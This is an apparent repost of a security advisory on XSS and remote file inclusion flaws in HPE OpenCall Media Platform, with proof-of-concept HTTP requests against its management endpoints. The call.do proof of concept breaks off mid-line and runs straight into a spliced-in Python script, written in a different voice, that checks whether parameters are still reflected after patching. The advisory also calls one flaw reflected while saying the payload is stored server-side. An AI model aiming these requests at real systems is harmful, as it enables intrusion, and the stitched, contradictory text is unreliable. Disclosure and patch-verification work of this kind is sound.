
Tuesday, April 25, 2017

[FD] SSD Advisory – HPE OpenCall Media Platform (OCMP) Multiple Vulnerabilities

Link: http://ift.tt/2oCSIm3

SSD Advisory – HPE OpenCall Media Platform (OCMP) Multiple Vulnerabilities

Want to get paid for a vulnerability similar to this one? Contact us at: ssd@beyondsecurity.com

Vulnerabilities Summary

The following advisory describes Reflected Cross-Site Scripting (XSS) vulnerabilities and a Remote File Inclusion vulnerability found in HPE OpenCall Media Platform (OCMP) version 4.3.2. Combined, they can lead to code execution.

HPE OpenCall Media Platform (OCMP) is a suite of software and hardware applications for implementing common telecom operator services such as voicemail, SMS (short message service), prepaid, billing, HLR, etc. It implements industry-standard telecom protocols such as SS7, ISUP, TCAP, SIP, MRCP, RTSP and VoiceXML. HPE OpenCall Media Platform offers a highly scalable, easy-to-manage, carrier-grade media platform that adapts to future networks and applications. Through its strong support of open standards and protocols, new applications can be rapidly developed and deployed in a way that preserves investments and reduces capital expenditures (CAPEX) and operational expenditure (OPEX).
Three components of HPE OpenCall Media Platform (OCMP) are vulnerable, each with the following issues:

Application Content Manager
- Reflected Cross-Site Scripting (XSS) – /mcm/resources/

Platform Administration Tool – Reflected Cross-Site Scripting (XSS) that leads to Remote Code Execution
- Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE0 parameter
- Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE1 parameter
- Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE2 parameter
- Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE3 parameter
- Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME0 parameter
- Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME1 parameter
- Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME2 parameter
- Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME3 parameter
- Reflected Cross-Site Scripting (XSS) – GetMapAction function
- Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NUM parameter
- Reflected Cross-Site Scripting (XSS) – GetMapAction function, NAME parameter
- Reflected Cross-Site Scripting (XSS) – cdrdispatch function, next parameter
- Reflected Cross-Site Scripting (XSS) – cdrdispatch function, sessionType parameter

VoiceXML Administration Tool
- Reflected Cross-Site Scripting (XSS) – event.do function
- Reflected Cross-Site Scripting (XSS) – call.do function
- Remote File Inclusion – proxylink.do function

Credit

An independent security researcher, Paolo Stagno from VoidSec, reported these vulnerabilities to Beyond Security's SecuriTeam Secure Disclosure program.
Vendor Response

HPE has released patches to address these vulnerabilities; for more details see: http://ift.tt/2pv5J6i

Vulnerabilities Details

Application Content Manager – /mcm/resources/

HPE OpenCall Media Platform (OCMP) does not sanitize the "description" and "prototype" parameters of /mcm/resources/. An attacker can inject malicious JavaScript to trigger the Cross-Site Scripting (XSS). Note that the payload is submitted in one request and returned by a later one, so it is held server-side between the two rather than echoed back directly.

Proof of Concept

The attacker sends the following POST request to the target OCMP server:

POST http://ift.tt/2q9GmTA HTTP/1.1
Host: 127.0.0.1:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/mcm+json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://ift.tt/2pvkIgv
Content-Length: 54
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

{ "": "", "description": ""}

The server will respond with:

HTTP/1.1 204 No Content
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Date: Wed, 23 Sep 2015 16:13:35 GMT
Server: Web Server

Then the attacker sends a second request to trigger the Cross-Site Scripting (XSS):

GET http://ift.tt/2q9OgMN HTTP/1.1
Host: 127.0.0.1:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://ift.tt/2pvkIgv
Connection: keep-alive

The server will respond with:

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Cache-control: no-cache
Content-Type: application/json
Transfer-Encoding: chunked
Date: Wed, 23 Sep 2015 16:13:35 GMT
Server: Web Server

VoiceXML Administration Tool – call.do function

HPE OpenCall Media Platform (OCMP) does not sanitize the parameters of the call.do function. An attacker can inject malicious JavaScript to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL: /om/call.do?action=list_calls&type=XSS_HERE

Proof of Concept

The attacker sends the following GET request to the target OCMP server:

GET /om/call.do?action=list_calls&type=Active637a3
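After applying HPE's patch, the question a practitioner has is whether each of the listed GET parameters is still reflected verbatim. The following is an added example (not code from the advisory, VoidSec or HPE) that probes the parameters named above with a harmless canary: an unguessable marker followed by the four characters (< > " ') an HTML context must encode. It sends no script, so it can be run against a production management interface, and it classifies each response as unescaped (still reflecting raw input), escaped, altered (filtered in some other way; review by hand) or absent. Only /om/call.do?action=list_calls&type= is given in full on this page; the /GetMapAction and /cdrdispatch paths used for the Platform Administration Tool servlets are assumptions and must be adjusted to the real install, and the fake_ocmp() responder is a constructed stand-in so the example runs offline.

```python
"""
Canary-based reflection check for the OCMP GET parameters named in the advisory.
Added example; not from the advisory, VoidSec or HPE. Sends no script payload.
"""
import html
import secrets
from typing import Callable, Dict, List, Tuple
from urllib.parse import parse_qs, urlencode, urlsplit

# Characters that must be encoded in an HTML body or attribute context.
SPECIALS = "<>\"'"

# (path, fixed query parameters, probed parameter). Only /om/call.do is given in
# full on the page; the /GetMapAction and /cdrdispatch paths are ASSUMPTIONS for
# the Platform Administration Tool servlets and must be adjusted per install.
GETMAP_PARAMS = (
    [f"LEV_TYPE{i}" for i in range(4)]
    + [f"LEV_NAME{i}" for i in range(4)]
    + ["LEV_NUM", "NAME"]
)
PROBES: List[Tuple[str, Dict[str, str], str]] = (
    [("/om/call.do", {"action": "list_calls"}, "type")]
    + [("/GetMapAction", {}, p) for p in GETMAP_PARAMS]
    + [("/cdrdispatch", {}, p) for p in ("next", "sessionType")]
)


def make_canary() -> str:
    """Random marker plus the HTML-special characters. The random part keeps
    the canary from matching pre-existing page content by accident."""
    return "ocmp" + secrets.token_hex(4) + SPECIALS


def build_probe_urls(base: str, canary: str) -> List[Tuple[str, str, str]]:
    """Return (path, parameter, full URL) for every probed parameter."""
    urls = []
    for path, fixed, param in PROBES:
        query = dict(fixed)
        query[param] = canary
        urls.append((path, param, base.rstrip("/") + path + "?" + urlencode(query)))
    return urls


def classify_reflection(body: str, canary: str) -> str:
    """'unescaped': canary returned verbatim (input still reflected raw).
    'escaped':   canary returned HTML-encoded (output encoding in place).
    'altered':   marker present but the specials were changed or stripped.
    'absent':    the parameter is not reflected in this response at all."""
    if canary in body:
        return "unescaped"
    if html.escape(canary, quote=True) in body:
        return "escaped"
    if canary[: -len(SPECIALS)] in body:
        return "altered"
    return "absent"


def check_endpoints(base: str, fetch: Callable[[str], str]) -> Dict[str, str]:
    """Probe every endpoint through fetch(url) -> body and classify each one.
    Pass a real HTTP client (e.g. a urllib or requests wrapper) as fetch."""
    canary = make_canary()
    return {
        f"{path}?{param}": classify_reflection(fetch(url), canary)
        for path, param, url in build_probe_urls(base, canary)
    }


def fake_ocmp(url: str) -> str:
    """CONSTRUCTED stand-in for a server so the example runs offline:
    call.do echoes `type` verbatim (the advisory's behaviour), GetMapAction
    HTML-encodes its output (a fixed servlet), cdrdispatch echoes nothing."""
    parts = urlsplit(url)
    qs = {k: v[0] for k, v in parse_qs(parts.query).items()}
    if parts.path == "/om/call.do":
        return f"<html><body>Calls of type {qs['type']}</body></html>"
    if parts.path == "/GetMapAction":
        values = " ".join(html.escape(v, quote=True) for v in qs.values())
        return f"<html><body>Map: {values}</body></html>"
    return "<html><body>OK</body></html>"


if __name__ == "__main__":
    for key, verdict in check_endpoints("https://127.0.0.1:8443", fake_ocmp).items():
        print(f"{verdict:9s} {key}")
```

Against a real host, replace fake_ocmp with a function that performs the GET with the management session's cookies and returns the decoded body; an "unescaped" verdict on any parameter means the advisory's condition still holds for that input, while "altered" deserves a manual look, since partial filtering (for example stripping only the angle brackets) often still leaves an attribute-context injection open.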
